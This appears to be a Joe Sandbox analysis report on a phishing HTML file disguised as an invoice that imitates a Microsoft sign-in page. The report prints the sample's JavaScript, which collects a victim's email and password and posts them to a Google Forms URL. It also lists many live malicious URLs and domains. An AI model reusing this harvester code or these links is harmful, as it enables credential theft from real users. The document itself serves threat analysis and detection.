Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Invoice for 04-09-24 fede39.admr.org.html
Detection:	MAL
Classification:	mal72.phis.winHTML@24/21@16/9
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.99, 64.233.164.84, 172.217.17.78, 104.18.186.31, 104.18.187.31, 172.217.17.46, 216.58.208.234, 142.250.181.138, 172.217.19.234, 172.217.19.202, 172.217.17.42, 142.250.181.106, 142.250.181.74, 172.217.19.10, 172.217.21.42, 172.217.17.74, 199.232.214.172, 142.250.181.142, 192.229.221.95, 142.250.200.206, 172.217.17.35, 142.250.201.14, 142.251.37.238, 13.107.246.63, 172.202.163.200, 92.122.16.236
Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, cdn.jsdelivr.net.cdn.cloudflare.net, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Input	Output
URL: file:///C:/Users/user/Desktop/Invoice%20for%2004... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and redirects to potentially malicious domains. The script collects user email and password information and sends it to a Google Forms URL, which could be used for phishing or other malicious purposes. Additionally, the script uses obfuscated code and conditional logic to determine the appropriate URL to send the data to, further increasing the risk. While the script may have some legitimate functionality, the overall risk profile is high due to the sensitive data collection and transmission to potentially untrusted domains." }
function handleSubmit(event) { event.preventDefault() document.querySelector('#loader').style.display = 'flex'; let email = document.getElementById('email').textContent let password = document.getElementById('pass').value console.log(email) if (password != "") { document.querySelector('img').style.opacity = '0.5' document.querySelector('fieldset').style.opacity = '0.5' document.querySelector('button').style.opacity = '0.5' document.querySelector('#links').style.opacity = '0.5' // let url = `https://docs.google.com/forms/u/0/d/e/1FAIpQLSeiv3vsClWAvMv6ARIhv9YuOQcratL-kX4KvYhzJyeIpSsUTg/formResponse?usp=pp_url&entry.489847516=${email}&entry.153696527=${password}` // let url = `https://docs.google.com/forms/d/e/1FAIpQLSeucJe0jbBSKCkR6MT2cQy0ZZA-Q8--35vK_jFOpbV5M_lMtQ/viewform?usp=pp_url&entry.949708245=${email}&entry.272584340=kkk&entry.252743457=${password}` let param = localStorage.getItem("new") let email2 = localStorage.getItem("email") if (param == 'yes' && email != null) { let url = 'https://docs.google.com/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/formResponse?usp=pp_url&entry.709402199=' + email2 + '&entry.1191394999=' + password fetch(url, { method: 'POST' }) console.log('first') } else if (param == null) { let url = 'https://docs.google.com/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/formResponse?usp=pp_url&entry.709402199=' + email + '&entry.1191394999=' + password fetch(url, { method: 'POST' }) console.log('second') } setTimeout(() => { let tl = anime.timeline({ easing: 'easeOutExpo', duration: 300, loop: true }); tl.add({ targets: '#loader div', translateX: 185, delay: anime.stagger(300, { easing: 'linear' }), duration: 500, // easing: 'linear', }) tl.add({ targets: '#loader div', translateX: 450, delay: anime.stagger(300, { easing: 'linear' }), duration: 500, // easing: 'linear', }) setTimeout(() => { document.querySelector('#loader').style.display = 'none'; document.getElementById('pass').value = '' document.querySelector('img').style.opacity = '1' document.querySelector('fieldset').style.opacity = '1' document.querySelector('button').style.opacity = '1' document.querySelector('#links').style.opacity = '1' document.querySelector('#error').style.display = 'none'; document.querySelector('#next').style.display = 'block'; }, 5000); }, 200); } } function handleNext(event) { event.preventDefault() document.querySelector('#loader2').style.display = 'flex'; let email = document.getElementById('email2').value console.log(email) if (email != "") { document.querySelector('#img').style.opacity = '0.5' document.querySelector('#fieldset').style.opacity = '0.5' document.querySelector('#button').sty
URL: :// Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: ://
URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Because you are accessing sensitive document, you need to verify your password", "prominent_button_name": "Verify", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Because you are accessing sensitive document, you need to verify your password", "prominent_button_name": "Verify", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Because you are accessing sensitive document, you need to verify your password", "prominent_button_name": "Verify", "text_input_field_labels": [ "Enter password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Because you are accessing sensitive document, you need to verify your password", "prominent_button_name": "Verify", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Enter password", "prominent_button_name": "Verify", "text_input_field_labels": [ "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Invoice%20for%2004-09-24%20fede39.admr.org.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.1.229	http://www.ledger-secure03948.sssgva.com/	Get hash	malicious	Unknown	Browse	cdn.jsdelivr.net/jquery.magnific-popup/1.0.0/jquery.magnific-popup.min.js
151.101.1.229	New Scanned Copy.html	Get hash	malicious	HTMLPhisher	Browse	cdn.jsdelivr.net/jquery.slick/1.6.0/slick.min.js
172.67.41.16	Ocean-T2I4I8O9.exe	Get hash	malicious	Unknown	Browse
	https://cdn.tailwindcss.com	Get hash	malicious	Unknown	Browse
	https://connexion-espacesclients.support/gkm/	Get hash	malicious	Unknown	Browse
	https://www.mobaps.eu	Get hash	malicious	Unknown	Browse
	https://activationmail-setupmailvalidationonlineaaosaiaosuaos.es/all/?e=bWpiQGhvbWVwYWdlYXBpLmNvbQ==	Get hash	malicious	Unknown	Browse
	https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.de	Get hash	malicious	HTMLPhisher	Browse
	https://uymtnxoiutrbebdxcfngvhbjnklijuygtfbrdxevfcgvhbjn.b-cdn.net/updatinggeneral004/index.html?b=Y3VzdG9tZXJzZXJ2aWNldGVhbUB3YWl0cm9zZS5jby51aw==	Get hash	malicious	Unknown	Browse
	https://uymtnxoiutrbebdxcfngvhbjnklijuygtfbrdxevfcgvhbjn.b-cdn.net/updatinggeneral004/index.html?b=Y3VzdG9tZXJzZXJ2aWNldGVhbUB3YWl0cm9zZS5jby51aw==	Get hash	malicious	Unknown	Browse
	https://uguroglu.com.tr/?uid=&psi=2410&c=E,1,gjTnlRdeljjKOCq2F4L5rlfgPqKxMiFp-FJVXZPBydkyE5NmL8Iwwk1INRX72TKXqRpDe31FdoKURWMjaJNyGY8ULlpJ25wFSgrCOSUa14j0sjpkSME,&typo=1	Get hash	malicious	Unknown	Browse
	https://fastsoluudapppmigratee.com/	Get hash	malicious	Unknown	Browse
239.255.255.250	https://alphaarchitect.com/2024/12/long-term-expected-returns/	Get hash	malicious	Unknown	Browse
	http://url4908.dhlecommerce.co.uk/ls/click?upn=u001.X2rfUT-2B51P1nILh8ZMtd4zxSiOlaeCaJtVhZupM-2F9LVEom-2B2QjKW7VcxuhsgKUeKnIPI_ewjtI2P4e42WCeQ3lgulQYJHXxC-2BKEQd0RqJfZdimIQiEcg5K71uNDU3wpKab4YU06GJXEZw9euxGD1hXreQRtHviPlL-2BsigHUpj3RYaHOJ-2FpfiIYtW5UZW-2FL-2BsfGEF-2Fu3A-2Bkin-2FRABSBeyYYIziUnz7H5jv9BuAlxlqnrkK7Xb-2BSSeTcIF0qb4hFEFWpSrypfKJHyCgl3tbBDsclBEPKsRVdEpjy6Dwgd1VZBghtqeTmGJ311VYG2rlnLwf52rNmVt0FUWd8IYzZVJADPK4JWoWP-2FevdRAolnQn3jiyaPa-2FoGFukWqUg1oi4mOa5JSgRM9klq2vHbg6hrhBgclPYZMSvATsKsPKxozGI6BjIj7xrP4YD2dZONVrYcGI5H8p	Get hash	malicious	HTMLPhisher	Browse
	https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.uk	Get hash	malicious	Fake Captcha	Browse
	https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznj	Get hash	malicious	Unknown	Browse
	https://www.bacselearning.co.uk/learn/forgot-password	Get hash	malicious	Unknown	Browse
	https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291	Get hash	malicious	Unknown	Browse
	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse
	https://u46509964.ct.sendgrid.net/ls/click?upn=u001.16O0hg1-2FLz1kpPxGHUZbqTUnkidniSFIXbuQ0K27NKGR5E4qQP4y3-2BK2LCxUfHTmD8VAoWu9fqrv96heRY-2BDaw-3D-3DTW9l_kcz-2FW2m7wWBC5iX2nmYizXpnEWoSr8Rc5lqOd2Tm8BrX2ha7XCwhAEdfUnTDQdcFlDoClQCenTHrYqYGrvROsmQGK19xExQ3O8UU0JUBZANb3FsycXG0lXfAeU6Ge3kEKNmMydUTpk2mvytxKM8NWM4-2BCe9md9gsZjY-2FmreGd712h4QJlOUlhQy19VQuOzLTR0hg5YGbygTAwGERJ0n3IsJQDuwHOGcAqA18p5ElbhIowXEJo1-2FUNhaAkl3hll56dS6aJMfJ2Cg7jctNhsypZwMqKm18nIQwqxy0HjDjPtDlRcWFBii-2BIabVdhAMwhtvbY-2BhH45kGHgqL1VbALLhTExLjDfFJ4Mdg1hbx5shtVSm69xnT8S0os3NwgUPcP6MZcGvFpVYjCIpNJRmEhnpApXmFzR0GdBotdIKDeKv3ZVh61As-2FSNo3vfT6a-2F1G6CSiTaxzhsqh2H-2BbaxKc9CNbAVT-2BT7dLfv3mwuz99sF3ZWYAQVhK-2FC3sPsTl5X4hdzGiFwatwFf8YUFBISMNX22jwRHFRxLR66dQgVtYo7IumZ-2FOZfPJ2G3u57Las-2FXsx3SO8XE1W1y4QspPQeH1YjVMsZnAeeR8w-2FvWRwY1A7qeifyIBD1fUq-2B4bmZYMnqZ3q5oEXMCBqA-2Fhiv6OawVXsyA5vOFgFJ9F0GjgBX8N-2FlVTcBHanqEGbxSYzxEvDD4r3DBgXj6FxUKNaXGPhd18AzzCXeX88LcJxWAPd-2Fv7JiB88FpQ5kwb7TyWiLLfMzbetfGykMOctbu8W3BbDsIyadCguknOKT9sBLCEKiPAam3h8kh-2BsXXxkR2EvqCeFfErZ3PwKa1SVHAEbQojZZV7jqlLyJR8KYd7Ob5ZMYMENFHn0kgSi7eB-2FawHwHTrEhLDYX-2BOWrkMOQimBc4NTUUy5DbdiVfhlyh7bL6srP-2ByInzpsE8pygdal5s3pCDu8-2F94-2B1f3C1MQ9-2FkWFJVilN3Xiglg-3D-3D	Get hash	malicious	Unknown	Browse
	http://124.110.62.12:50000	Get hash	malicious	Unknown	Browse
	http://119.47.184.247:8443	Get hash	malicious	Unknown	Browse
104.22.21.144	https://drive.usercontent.google.com/u/0/uc?id=1-lzlsIQVVFZj1nVUNs7vmgIfcVZr8ZT3&export=download	Get hash	malicious	Unknown	Browse
	https://cdn.tailwindcss.com	Get hash	malicious	Unknown	Browse
	https://connexion-espacesclients.support/gkm/	Get hash	malicious	Unknown	Browse
	https://www.mobaps.eu	Get hash	malicious	Unknown	Browse
	https://activationmail-setupmailvalidationonlineaaosaiaosuaos.es/all/?e=bWpiQGhvbWVwYWdlYXBpLmNvbQ==	Get hash	malicious	Unknown	Browse
	Notice_Of_New_Remittance.pdf	Get hash	malicious	Unknown	Browse
	https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3D	Get hash	malicious	HTMLPhisher	Browse
	https://uguroglu.com.tr/?uid=&psi=2410&c=e,1,gjtnlrdeljjkocq2f4l5rlfgpqkxmifp-fjvxzpbydkye5nml8iwwk1inrx72tkxqrpde31fdokurwmjajnygy8ullpj25wfsgrcosua14j0sjpksme,&typo=1	Get hash	malicious	Unknown	Browse
	https://uguroglu.com.tr/?uid=&psi=2410&c=E,1,gjTnlRdeljjKOCq2F4L5rlfgPqKxMiFp-FJVXZPBydkyE5NmL8Iwwk1INRX72TKXqRpDe31FdoKURWMjaJNyGY8ULlpJ25wFSgrCOSUa14j0sjpkSME,&typo=1	Get hash	malicious	Unknown	Browse
	https://web3resolution.pages.dev/	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jsdelivr.map.fastly.net	Ocean-T2I4I8O9.exe	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://whtt.termlicari.ru/HnkNbg/	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://ipfs.io/ipfs/bafybeih7f27bkklyai5zhnf5s57wuee5khsdrrblepmiz5bozrxxoam2lq/index12.html#pdeneve@vanas.eu	Get hash	malicious	HTMLPhisher	Browse	151.101.129.229
	https://www.grapevine.org/join/next-gen-giving-circle-dc	Get hash	malicious	Unknown	Browse	151.101.65.229
	http://bluepeak-group.com/fc	Get hash	malicious	Unknown	Browse	151.101.1.229
	Credit Card Authorization Form.pdf	Get hash	malicious	Unknown	Browse	151.101.129.229
	https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://6movies.stream/series/cobra-kai-80711/6-4/	Get hash	malicious	Unknown	Browse	151.101.1.229
	http://sdgfdjfgd19sdgfghfs.z33.web.core.windows.net	Get hash	malicious	TechSupportScam	Browse	151.101.129.229
	http://www.delinian.com	Get hash	malicious	Unknown	Browse	151.101.1.229
cdn.tailwindcss.com	Ocean-T2I4I8O9.exe	Get hash	malicious	Unknown	Browse	172.67.41.16
	https://drive.usercontent.google.com/u/0/uc?id=1-lzlsIQVVFZj1nVUNs7vmgIfcVZr8ZT3&export=download	Get hash	malicious	Unknown	Browse	104.22.20.144
	https://cdn.tailwindcss.com	Get hash	malicious	Unknown	Browse	172.67.41.16
	https://connexion-espacesclients.support/gkm/	Get hash	malicious	Unknown	Browse	172.67.41.16
	https://www.mobaps.eu	Get hash	malicious	Unknown	Browse	104.22.21.144
	https://activationmail-setupmailvalidationonlineaaosaiaosuaos.es/all/?e=bWpiQGhvbWVwYWdlYXBpLmNvbQ==	Get hash	malicious	Unknown	Browse	104.22.21.144
	Notice_Of_New_Remittance.pdf	Get hash	malicious	Unknown	Browse	104.22.20.144
	https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.22.20.144
	https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.de	Get hash	malicious	HTMLPhisher	Browse	172.67.41.16
	https://uymtnxoiutrbebdxcfngvhbjnklijuygtfbrdxevfcgvhbjn.b-cdn.net/updatinggeneral004/index.html?b=Y3VzdG9tZXJzZXJ2aWNldGVhbUB3YWl0cm9zZS5jby51aw==	Get hash	malicious	Unknown	Browse	104.22.20.144
